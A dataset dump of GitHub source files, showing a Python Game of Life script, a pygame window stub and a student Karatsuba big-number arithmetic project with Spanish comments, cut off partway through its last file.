"content_id": "e6643e6d2f84428bbeca1aa96cd035b806629d8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3079,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 114,
"path": "/testy.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import numpy\n\nwidth=5\nheight=5\n# grid = [[0 for x in range(width)] for y in range(height)]\ngrid=numpy.zeros((width,height),int)\n\n# print(len(grid))\n\ngrid[0][2]=1\ngrid[1][3]=1\ngrid[2][1]=1\ngrid[2][2]=1\ngrid[2][3]=1\n\n# grid=numpy.zeros((5,5),int)\n# print(grid[1][1])\n\n# grid2=numpy.copy(grid)\n# grid3=numpy.copy(grid)\n#\n# grid2[4][4]=5\n#\n# grid=numpy.copy(grid2)\n\n# for i in range(len(grid)):\n# print(grid[i])\n\n# num_of_neighbours <2 --> DIE\n# num_of_neighbours >3 --> DIE\n# num_of_neighbours 2 or 3 --> LIVE\n# num_of_neighbours == 3 --> RESSURECT (if dead)\n\n# input('pauza')\n#\nfor step in range(10):#kroky simulace\n\n for i in range(len(grid)): #vykresli matici\n print(grid[i])\n\n input('pauza') #---PAUZA---\n\n grid_new = numpy.zeros((width, height), int) # nova matice (na zacatku vynulovana)\n\n for m in range(height):#po radcich\n for n in range(width):#po sloupcich\n num_of_neighbours=0 #vynulovat pred kazdou novou bunkou\n #\n #operace pro danou bunku:\n #\n\n try:#podivej nahoru\n if grid[m-1][n]==1:\n num_of_neighbours+=1\n except IndexError:\n pass\n\n try: # podivej vpravo nahoru\n if grid[m - 1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo\n if grid[m][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vpravo dolu\n if grid[m+1][n+1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej dolu\n if grid[m + 1][n] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo dolu\n if grid[m + 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo\n if grid[m][n-1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n try: # podivej vlevo nahoru\n if grid[m - 1][n - 1] == 1:\n num_of_neighbours += 1\n except IndexError:\n pass\n\n if grid[m][n]==0: #pokud je aktualni bunka mrtva...\n if num_of_neighbours==3: #...ale ma 3 sousedy...\n grid_new[m][n]=1 #... --> ozivit (jinak je defaultne mrtva)\n\n if grid[m][n]==1: #pokud je aktualni bunka ziva...\n if num_of_neighbours==2 or num_of_neighbours==3: #...a ma 2 nebo 3 sousedy...\n grid_new[m][n] = 1 #...nech ji zit (jinak je defaultne mrtva)\n\n grid=numpy.copy(grid_new) #update zakladni grid\n\n\n# try:\n# grid[100]\n# except IndexError:\n# print('au')"
},
{
"alpha_fraction": 0.611707329750061,
"alphanum_fraction": 0.6614634394645691,
"avg_line_length": 30.090909957885742,
"blob_id": "b9d39bef6ad2f96012a29e02a7b4c06a135b0ea9",
"content_id": "fe00264466c52eaad711cc60169f2a63feeda214",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 33,
"path": "/06_gameoflife/06_gameoflife_02.py",
"repo_name": "jnajman/hackaton",
"src_encoding": "UTF-8",
"text": "import pygame, sys, time\npygame.init() # initialize the pygame system\nsize = (500, 500) # window size is a 2-tuple measured in px\nscreen = pygame.display.set_mode(size)\nmargin=10\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\n\n# Initialize the clock\nclock = pygame.time.Clock()\nmax_fps = 60 # maximum number of cycles (frames) per second\n\nwhile True:\n clock.tick(max_fps) # limit the refresh rate to a max of 60 cycles per second\n\n # Quit when the user closes the window\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN:\n # Get mouse position whenever it moves\n mouse_position = event.pos # event.pos is a mouse position 2-tuple\n print(mouse_position)\n\n\n screen.fill((255, 255, 255)) # RGB white color tuple\n\n # screen.blit(tile, (200, 100)) # Draw the tile on the screen\n\n pygame.display.flip() # Display what was drawn this turn"
}
] | 11 |
AnZuCa/Karatsuba | https://github.com/AnZuCa/Karatsuba | 8ddba18d1805f45c36c569f59e3cc349b49d2658 | 39de0013a97a3276c941241fb8c000fbbbc80513 | fe31dffbdc33b30436f8d8720f1e3ce3eb8c06bb | refs/heads/master | 2022-06-25T06:33:36.207288 | 2020-05-05T21:44:22 | 2020-05-05T21:44:22 | 261,589,348 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4768112301826477,
"alphanum_fraction": 0.49285534024238586,
"avg_line_length": 31.805084228515625,
"blob_id": "0440b94ee9bfd821aea7cd1a143bbe4aae7f5555",
"content_id": "b293038b98798c9bb958f2a245a2b042fe1ffb09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3989,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 118,
"path": "/Karatsuba/src/Knum.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\r\nfrom Num import *\r\n#Autores:\r\n#Andres Zuniga Calderon(10am)\r\n#Braslyn Rodriguez (8am)\r\n#grupo:04-10am\r\n\r\n\r\n\r\nclass Knum(Num):\r\n \r\n def __mul__(self,other): \r\n \"\"\"Funcion de karatsuba es mas eficiente que una multiplicacion de escuela\r\n Multiplica dos Knum con el algoritmo de karatsuba\r\n \r\n self = [2,5] other = [5,0] n = max entre self y other , nby2 = n//2 si es impar se suma 1\r\n \r\n despues se dividen self a la mitad y other tmabien en a,b para self y c,d para other\r\n a[2] , b[5], c[5], d=[0]\r\n \r\n ac = a * c = [2] * [5]\r\n = [1,0]\r\n\r\n bd = b * d = [5] * [0] \r\n = [0] \r\n \r\n k = ( a + b) * (c + d) - ac - bd = ([2]+[5]) * ([5]+[0]) - [1,0] - [0] = [2,5]\r\n \r\n \r\n return (ac << ((n-nby2)*2)) + (k << (n-nby2)) + bd = [1,0,0,0] + [2,5,0] + [0] = [1,2,5,0] \r\n \r\n \r\n \"\"\"\r\n self.Verificaciones(other)\r\n if len(self) == 1 or len(other) == 1:\r\n numero = copy.copy(super().__mul__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n else:\r\n #si se desea que el programa funcione con negativos se deben implementar las siguientes instrucciones \r\n if self.Complemento and other.Complemento:\r\n return ~self * ~other\r\n elif self.Complemento:\r\n return ~(~self * other)\r\n elif other.Complemento:\r\n return ~(self * ~ other)\r\n n = max(len(self),len(other))\r\n nby2 = n // 2\r\n if n % 2 != 0:\r\n nby2 += 1\r\n self_copy = copy.copy(self.ListaN[self.size-n:])\r\n other_copy= copy.copy(other.ListaN[self.size-n:])\r\n a = type(self)(self_copy[:nby2],self.base,self.Complemento)\r\n b = type(self)(self_copy[nby2:],self.base,self.Complemento)\r\n c = type(other)(other_copy[:nby2],other.base,other.Complemento)\r\n d = type(other)(other_copy[nby2:],other.base,other.Complemento)\r\n ac = a * c\r\n bd = b * d\r\n k = (a + b) * (c + d) - ac - bd\r\n return (ac << ((n-nby2)*2)) + (k << (n-nby2)) + bd\r\n\r\n \r\n \r\n def __invert__(self):\r\n return super().__invert__()\r\n\r\n\r\n def __getitem__(self,index):\r\n return super().__getitem__(index) \r\n\r\n\r\n def __len__(self):\r\n return super().__len__()\r\n\r\n def __le__(self,other):\r\n return super().__le__(other)\r\n\r\n \r\n def __gt__(self,other):\r\n return super().__gt__(other)\r\n\r\n\r\n def __repr__(self):\r\n return super().__repr__()\r\n\r\n \r\n def __lshift__(self,positions):\r\n numero = copy.copy(super().__lshift__(positions))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n\r\n def __rshift__(self,positions):\r\n numero = copy.copy(super().__rshift__(positions))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n def __eq__(self, other):\r\n return super().__eq__(other)\r\n Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n \r\n def __add__(self,other):\r\n numero = copy.copy(super().__add__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n \r\n def __floordiv__(self,other):\r\n numero = copy.copy(super().__floordiv__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n \r\n \r\n def __mod__(self,other):\r\n numero = copy.copy(super().__mod__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento) \r\n \r\n def __pow__(self,other):\r\n numero = copy.copy(super().__pow__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)\r\n\r\n def __sub__(self,other):\r\n numero = copy.copy(super().__sub__(other))\r\n return Knum(numero.ListaN,numero.base,numero.Complemento)"
},
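The Knum.__mul__ docstring walks the recurrence on digit lists ([2,5] * [5,0] -> ac, bd, k). The same three-multiplication scheme over plain Python ints, for comparison (the split convention differs slightly: floor instead of the class's ceiling halves):

    def karatsuba(x, y):
        # Base case: single-digit factors
        if x < 10 or y < 10:
            return x * y
        half = max(len(str(x)), len(str(y))) // 2
        a, b = divmod(x, 10 ** half)  # high / low halves of x
        c, d = divmod(y, 10 ** half)  # high / low halves of y
        ac = karatsuba(a, c)
        bd = karatsuba(b, d)
        k = karatsuba(a + b, c + d) - ac - bd
        return ac * 10 ** (2 * half) + k * 10 ** half + bd

    print(karatsuba(25, 50))  # 1250, matching the docstring example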
{
"alpha_fraction": 0.4989231824874878,
"alphanum_fraction": 0.5204594135284424,
"avg_line_length": 32.024391174316406,
"blob_id": "4b85876744bb61516994250230fada697c503bd9",
"content_id": "0140cf110a2e3507b7524d1014c7123fb6900a54",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 41,
"path": "/Karatsuba/src/Pruebas_csv.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nfrom read_test_cases import *\r\n\r\ndef Prueba():\r\n \"\"\"\r\n Funcion para ejecutar el read_test_cases.py con nuestros casos pruebas se le\r\n envian dos parametro el csv y el tipo de caso que va a ejecutar\r\n \r\n cada uno de los csv realizados para esta prueba estan hechos \r\n para que siempre todos los casos esten correctos\r\n \"\"\"\r\n print(\"-----------------Casos para Suma-------------------\")\r\n lectura(\"../test/test_suma.csv\",\"+\")\r\n print()\r\n print(\"-----------------Casos para Resta-------------------\")\r\n lectura(\"../test/test_resta.csv\",\"-\")\r\n print()\r\n print(\"-----------------Casos para Multiplicacion-------------------\")\r\n lectura(\"../test/test_multiplicacion.csv\",\"*\")\r\n print()\r\n print(\"-----------------Casos para Division-------------------\")\r\n lectura(\"../test/test_Division.csv\",\"//\")\r\n print()\r\n print(\"-----------------Casos para Mod-------------------\")\r\n lectura(\"../test/test_mod.csv\",\"%\")\r\n print()\r\n print(\"-----------------Casos para Exponente-------------------\")\r\n lectura(\"../test/test_exponente.csv\",\"**\")\r\n print()\r\n print(\"Pruebas Finalizadas\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n #Aqui llamos a Prueba encargado de ejecutarme cada una de las pruebas con los .CSV\r\n Prueba()"
},
{
"alpha_fraction": 0.46718770265579224,
"alphanum_fraction": 0.5066702365875244,
"avg_line_length": 37.764076232910156,
"blob_id": "a0f46c1fe1253cb5b61fcfe6f17eee3c7e20d8ee",
"content_id": "83baab8c7a6f5af88ca5629f245dcd2267d0125e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14848,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 373,
"path": "/Karatsuba/src/Num.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nfrom CheckNum import *\r\nimport copy\r\n\r\n\r\nclass Num:\r\n base=10\r\n size=16\r\n cadena=\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n def __init__(self,numero,Base = 10,complemento = False):\r\n \"\"\"\r\n convierte los numeros del compilador a numeros propios de la clase verifica que esten en la base \r\n y que el tamaño no exceda 16\r\n \"\"\"\r\n \r\n if CheckNum.Check(numero,Base) and CheckNum.Size(numero):\r\n self.Complemento = complemento\r\n self.base=Base\r\n if type(numero) == list: \r\n self.ListaN = copy.copy(numero)\r\n self.ListaN = [0]* (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n else:\r\n self.ListaN = CheckNum.ConvertListtoint(str(numero))\r\n self.ListaN = [0] * (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n \r\n def __invert__(self):\r\n \"\"\"\r\n Funcion que crea el complemento\r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1] base 10\r\n \r\n Se toma esa lista y se va comparando cuanto le falta a cada numero para ser \r\n igual a la base - 1\r\n \r\n se obtiene [9,9,9,9,9,9,9,9,9,9,9,9,9,9,8]\r\n \r\n Uso la sobrecarga del operador + para sumarle uno a la lista\r\n \r\n Resultado final [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9] \r\n \r\n \"\"\"\r\n listaInv = []\r\n for i in range(self.size):\r\n listaInv.append(self.base-1 - self[i])\r\n if self.Complemento == True:\r\n return Num(listaInv,self.base,False) + Num(1,self.base,False)\r\n return Num(listaInv,self.base,True) + Num(1,self.base,False)\r\n \r\n def Negativos(self):\r\n \"\"\"\r\n Funcion encargada de mostrar un negativo al usuario\r\n Convierte una lista a su respectivo entero si es base menor que 10 o mayor o igual que 10 \r\n ejemplo \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,3,3,3]\r\n \r\n al convertirlo a entero obtenemos 333 \r\n finalmente se le concatena un \"-\" al inicio\r\n \r\n \"\"\"\r\n aux = copy.copy(~self)\r\n if self.base < 11: return int(\"-\" + str(aux.int()))\r\n else: return \"-\" + self.base_mayor_10()\r\n \r\n \r\n def show_number(self):\r\n \"\"\"\r\n Funcion encargada de mostrar los numeros al usuario\r\n Devuelve el numero positivo o negativo\r\n \"\"\"\r\n if self.Complemento:\r\n return self.Negativos()\r\n else:\r\n if self.base < 11:\r\n return self.int()\r\n else:\r\n return self.base_mayor_10()\r\n \r\n def base_mayor_10(self):\r\n \"\"\"\r\n Funcion encargada de transformar un numero en base mayor a 10 con sus respectivas letras dependiendo de la base\r\n primero se recorre la lista para ver su tamaño ya que puede tener numero mayores o iguales a 10 \r\n despues de eso se corta esa lista en una mas pequeña donde estan todos los numeros sin los ceros adelante\r\n despues concateno cada uno de los numeros transformado a su base con una variable cadena que está al principio\r\n \r\n ejemplo\r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,5,10] que vendria siendo igual a 5A en base 16\r\n \r\n el resultado seria \"5A\"\r\n \r\n \"\"\"\r\n if self.Complemento: self_copy = copy.copy(~self)\r\n else: self_copy = copy.copy(self)\r\n numero = \"\"\r\n contador = 0\r\n while self_copy[contador] == 0 and contador<15:\r\n contador+=1\r\n new = []\r\n new = self_copy.ListaN[contador:16]\r\n for i in new:\r\n numero += self.cadena[i] \r\n return numero \r\n \r\n def __eq__(self,other):\r\n \"\"\"Sobrecarga de == que verifica si dos Num son iguales\"\"\"\r\n return self.int() == other.int()\r\n def __ne__(self,other):\r\n \"\"\"\r\n 
sobrecarga del operador != devuelve un true si self y other son diferentes\r\n de lo contrario devuelve false\r\n \"\"\"\r\n return str(self.show_number()) != str(other.show_number())\r\n \r\n def int(self):\r\n \"\"\"\r\n Muestra la lista como numeros del compilador\r\n \"\"\"\r\n if self.base > 10:\r\n return self.base_mayor_10()\r\n aux=0\r\n inc=1\r\n for i in range(len(self.ListaN)):\r\n aux+=self.ListaN[-(i+1)]*inc\r\n inc*=10\r\n return aux\r\n\r\n def __getitem__(self,index):\r\n \"\"\"\r\n Muetra los numeros dentro de la lista (eje invertido \"Provicional\")\r\n \"\"\"\r\n return self.ListaN[index]\r\n\r\n\r\n def __len__(self):\r\n \"\"\"\r\n Retorna el tamaño del digito que esta en la lista, si es negativo devuelve 16\r\n \"\"\"\r\n if self.Complemento:return self.size\r\n return(len(str(self.int())))\r\n def __le__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador <= me indica si other es mayor o igual que self\r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True:return True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() <= other.int(): return True \r\n return False\r\n \r\n def __gt__(self,other):\r\n \"\"\"\r\n Esta sobrecarga > sirve para mostrar \r\n \"\"\"\r\n if self.Complemento==False and other.Complemento==True: return True\r\n elif self.Complemento==True and other.Complemento==False:return False\r\n elif self.int() > other.int():return True \r\n return False \r\n\r\n def __repr__(self):\r\n \"\"\"\r\n aprovecha la funcion int para mostrar los valores por string\r\n \"\"\"\r\n return f\"(Valor: {self.show_number()}) (Base:{self.base}) (Max:10 **{self.size}) \\n\"#{self.ListaN}\r\n \r\n def __lshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la izquierda <<\r\n Toma un Num y lo corre cierta cantidad de positions a la izq \r\n ejemplo toma la lista \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,5]\r\n y siendo positions por ejemplo igual a 1\r\n el resultado seria \r\n [0,0,0,0,0,0,0,0,0,0,0,0,1,5,0]\r\n \r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list = []\r\n list = aux.ListaN + [0] * positions\r\n aux.ListaN=list[len(list)-self.size:len(list)]\r\n return aux\r\n def __rshift__(self,positions):\r\n \"\"\"\r\n Mueve todos los digitos a la derecha >>\r\n Toma un Num y lo corre cierta cantidad de positions a la izq \r\n ejemplo toma la lista \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,5]\r\n y siendo positions por ejemplo igual a 1\r\n el resultado seria \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1]\r\n \"\"\"\r\n if not isinstance(positions,int): raise Exception(\"positions no es un int\") \r\n if positions < 0: raise Exception(f\"El entero {positions} no es positivo\") \r\n aux = copy.copy(self)\r\n list=[]\r\n list = [0]* positions + aux.ListaN \r\n aux.ListaN = list[0:self.size]\r\n return aux \r\n \r\n def __eq__(self, other):\r\n \"\"\"\r\n Funcion que verifica si self es igual a other\r\n \"\"\"\r\n return self.int() == other.int()\r\n \r\n def Verificaciones(self,other):\r\n \"\"\"\r\n Funcion encargada de verificar si al hacer cierta operacion estan en la misma base\r\n y son de la misma clase\r\n \"\"\"\r\n if not isinstance(other,Num): raise Exception(f\"other no es tipo Num\") \r\n if not self.base == other.base: raise Exception(f\"La base self {self.base} != La base other {other.base}\")\r\n return True\r\n \r\n def __add__(self,other):\r\n 
\"\"\"\r\n suma de dos numeros de la propia clase Numero, esta toma caracter(int) por caracter(int) de atras hacia delante\r\n y los suma, tambien se acarrea si es necesario\r\n Toma las listas de self y other despues las recorre dependiendo de cual de los dos sea mas grande \r\n \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,3] Lista de self base 10\r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,1,2,3] Lista de other base 10\r\n +-------------------------------\r\n [1,2,6]\r\n \"\"\"\r\n self.Verificaciones(other)\r\n \r\n Residuo=0#lleva los decimales centenas ... que superen la capacidad de la respectiva unidad\r\n suma=0\r\n new=[] \r\n for i in range(15,self.size-max(len(other),len(self))-1,-1):\r\n suma = self[i] + other[i]\r\n suma += Residuo\r\n if suma >= self.base:\r\n if i == self.size-max(len(other),len(self)):\r\n new.append(suma-self.base)\r\n new.append(suma//self.base)\r\n else:\r\n new.append(suma-self.base)\r\n Residuo = suma//self.base\r\n else:\r\n new.append(suma)\r\n Residuo = 0\r\n new = new[::-1]\r\n if self.Complemento == True or other.Complemento == True: #Aqui verifico si alguno de los numeros es negativo\r\n if new[1] == self.base-1: return Num(new[len(new)-self.size:len(new)],self.base,True)# si el resultado es negativo\r\n else: return Num(new[len(new)-self.size:len(new)],self.base)\r\n return Num(new,self.base)\r\n \r\n def __mul__ (self,other):\r\n \"\"\"\r\n Funcion encargada de multiplicar de la forma ,suma de self una cantidad de veces other despues los voy\r\n acumulando para el resultado final\r\n \r\n other.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2]\r\n self.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2]\r\n \r\n primero sumo el 222, 2 veces y obtengo = [0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4] base 10\r\n despues sumo el 222, 1 vez y obtengo = [0,0,0,0,0,0,0,0,0,0,0,0,0,2,2,2]\r\n finalmente es necesario correr la lista anterior un cero a la izq [0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0]\r\n\r\n Despues de los pasos anteriores\r\n se suman y obtenemos \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4] \r\n [0,0,0,0,0,0,0,0,0,0,0,0,2,2,2,0]\r\n +-------------------------------\r\n [0,0,0,0,0,0,0,0,0,0,0,0,2,6,6,4]\r\n \r\n \"\"\"\r\n self.Verificaciones(other)\r\n resultado = Num(0,self.base)#Este Num guarda la suma de cada multiplicacion que se hace\r\n resultado_final = Num(0,self.base)\r\n self_copy = copy.copy(self)\r\n aux=copy.copy(other)\r\n if other.Complemento: aux = copy.copy(~other) #estos dos if verifican si alguno de los numeros es negativo\r\n if self.Complemento: self_copy = ~self_copy #y si encuentra uno lo pasa a positivo\r\n contador = 0\r\n Valor = str(aux.int())\r\n Valor = Valor[::-1]\r\n for i in Valor: #De aqui obtengo la cantidad de veces que será sumado self_copy \r\n aux = Num(i,self.base) \r\n while aux > Num(0,self.base):\r\n aux -= Num(1,self.base)\r\n resultado += self_copy \r\n resultado = resultado << contador \r\n resultado_final += resultado\r\n resultado = Num(0,self.base)\r\n contador+=1\r\n \r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~resultado_final \r\n else:\r\n return resultado_final \r\n \r\n def __floordiv__(self,other):\r\n \"\"\"\r\n Esta funcion es para la division, Se usa un contador para ver cuantas veces se tiene que sumar other \r\n para que sea menor si no se puede llegar a ser igual que self,o igual si se puede, operador // \r\n \r\n \"\"\" \r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n 
contador=Num(0,self.base)\r\n if other.Complemento:\r\n aux = copy.copy(~other)\r\n other_copy = copy.copy(~other)\r\n if self.Complemento:\r\n self_copy = copy.copy(~self_copy)\r\n \r\n while aux <= self_copy:\r\n if aux <= self_copy:\r\n contador += Num(1,self.base)\r\n aux += other_copy\r\n if (other.Complemento and self.Complemento==False) or (other.Complemento==False and self.Complemento):\r\n return ~contador \r\n else:\r\n return contador\r\n \r\n \r\n def __mod__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador % retorna el mod de self / other \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,5] self.ListaN -----> [5] |[2] -----> [2] * [2] = [4] ---> [5] + ~[4] = [1] \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2] other.ListaN [4] |____ \r\n - --- 2\r\n [1]\r\n \r\n \"\"\" \r\n self.Verificaciones(other)\r\n return self-(self//other)*other\r\n \r\n \r\n def __pow__(self,other):\r\n \"\"\"\r\n Sobrecarga del operador ** aqui se multiplica self cantidad de veces other\r\n \"\"\"\r\n\r\n self.Verificaciones(other)\r\n self_copy = copy.copy(self)\r\n aux = copy.copy(other)\r\n other_copy = copy.copy(other)\r\n resultado=Num(1,self.base)\r\n if other.Complemento: raise(\"La sobrecarga division x**n no sirve con n negativos\")\r\n while aux > Num(0,self.base):\r\n resultado = resultado * self_copy\r\n aux -= Num(1,other.base)\r\n return resultado\r\n\r\n def __sub__(self,other):\r\n \"\"\"\r\n Algoritmo consiste en la implementacion de la resta clasica\r\n \r\n other.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,2] base = 10\r\n ~other.ListaN = [9,9,9,9,9,9,9,9,9,9,9,9,9,9,8,8]\r\n self.ListaN = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,5] \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,5]\r\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,8,8]\r\n - -------------------------------- \r\n [0,0,0,0,0,0,0,0,0,0,0,0,0,0,3]\r\n \r\n \r\n \r\n \"\"\"\r\n self.Verificaciones(other)\r\n return self + ~other\r\n \r\n"
},
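Num.__sub__ reduces subtraction to self + ~other, i.e. addition of the ten's complement, exactly as the __sub__ docstring's 15 - 12 = 3 example shows. The same arithmetic with plain ints over 16 base-10 digits, as a quick check:

    SIZE = 16
    MOD = 10 ** SIZE  # 16 digits in base 10, as in Num.size

    def tens_complement(x):
        # Digit-wise (base-1) inversion plus one, modulo the digit capacity
        return (MOD - 1 - x + 1) % MOD

    a, b = 15, 12
    print((a + tens_complement(b)) % MOD)  # 3 == 15 - 12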
{
"alpha_fraction": 0.5164259672164917,
"alphanum_fraction": 0.5259690880775452,
"avg_line_length": 36.451297760009766,
"blob_id": "958a613980bf026bc288275b1f55acb12936b3f0",
"content_id": "9123283fceb6ad40d58a92b30d0058a2e1bca1b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11844,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 308,
"path": "/Karatsuba/src/Num_con_cache.py",
"repo_name": "AnZuCa/Karatsuba",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTrabajo Karatsuba\r\nAutores:\r\nBraslyn Rodriguez Ramirez (08:00 am) ID:402420750\r\nAndres Zuñiga Calderon(10:00am) ID:402430799\r\ngroup:04-08am\r\n\"\"\"\r\nfrom CheckNum import *\r\nimport copy\r\nfrom functools import lru_cache #Aqui se importa el cache\r\n\r\nclass NumC:\r\n base=10\r\n size=16\r\n cadena=\"0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\n def __init__(self,numero,Base = 10,complemento = False):\r\n \"\"\"\r\n convierte los numeros del compilador a numeros propios de la clase verifica que esten en la base \r\n y que el tamaño no exceda 16\r\n \"\"\"\r\n \r\n if CheckNum.Check(numero,Base) and CheckNum.Size(numero):\r\n self.cache = dict()\r\n self.Complemento = complemento\r\n self.base=Base\r\n if type(numero) == list: \r\n self.ListaN = copy.copy(numero)\r\n self.ListaN = [0]* (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n else:\r\n self.ListaN = CheckNum.ConvertListtoint(str(numero))\r\n self.ListaN = [0] * (self.size - len(self.ListaN)) + self.ListaN\r\n \r\n \r\n def __invert__(self):\r\n \"\"\"\r\n Funcion que crea el complemento\r\n \"\"\"\r\n listaInv = []\r\n for i in range(self.size):\r\n listaInv.append(self.base-1 - self[i])\r\n if self.Complemento == True:\r\n return NumC(listaInv,self.base,False) + NumC(1,self.base,False)\r\n return NumC(listaInv,self.base,True) + NumC(1,self.base,False)\r\n \r\n def Negativos(self):\r\n \"\"\"\r\n Funcion encargada de mostrar un negativo al usuario\r\n \"\"\"\r\n aux = copy.copy(~self)\r\n if self.base < 11: return int(\"-\" + str(aux.int()))\r\n else: return \"-\" + self.base_mayor_10()\r\n \r\n \r\n def show_number(self):\r\n \"\"\"\r\n Funcion encargada de mostrar los numeros al usuario\r\n \"\"\"\r\n if self.Complemento:\r\n return self.Negativos()\r\n else:\r\n if self.base < 11:\r\n return self.int()\r\n else:\r\n return self.base_mayor_10()\r\n \r\n def base_mayor_10(self):\r\n \"\"\"\r\n Funcion encargada de transformar un numero en base mayor a 10 con sus respectivas letras dependiendo de la base\r\n \"\"\"\r\n if self.Complemento: self_copy = copy.copy(~self)\r\n else: self_copy = copy.copy(self)\r\n numero = \"\"\r\n contador = 0\r\n while self_copy[contador] == 0 and contador<15:\r\n contador+=1\r\n new = []\r\n new = self_copy.ListaN[contador:16]\r\n for i in new:\r\n numero += self.cadena[i] \r\n return numero \r\n \r\n def __eq__(self,other):\r\n \"\"\"Sobrecarga de == que verifica si dos Num son iguales\"\"\"\r\n return self.int() == other.int()\r\n def __ne__(self,other):\r\n \"\"\"\r\n sobrecarga del operador != devuelve un true si self y other son diferentes\r\n de lo contrario devuelve false\r\n \"\"\"\r\n return str(self.show_number()) != str(other.show_number())\r\n \r\n def int(self):\r\n \"\"\"\r\n Muestra la lista como numeros del compilador\r\n \"\"\"\r\n if self.base > 10:\r\n return self.base_mayor_10()\r\n aux=0\r\n inc=1\r\n for i in range(len(self.ListaN)):\r\n aux+=self.ListaN[-(i+1)]*inc\r\n inc*=10\r\n return aux\r\n\r\n def __getitem__(self,index):\r\n \"\"\"\r\n Muetra los numeros dentro de la lista (eje invertido \"Provicional\")\r\n \"\"\"\r\n return self.ListaN[index]\r\n\r\n\r\n def __len__(self):\r\n \"\"\"\r\n Retorna el tamaño del digito que esta en la lista, si es negativo devuelve 16\r\n \"\"\"\r\n if self.Complemento:return self.size\r\n return(len(str(self.int())))\r\n def __le__(self,other):\r\n 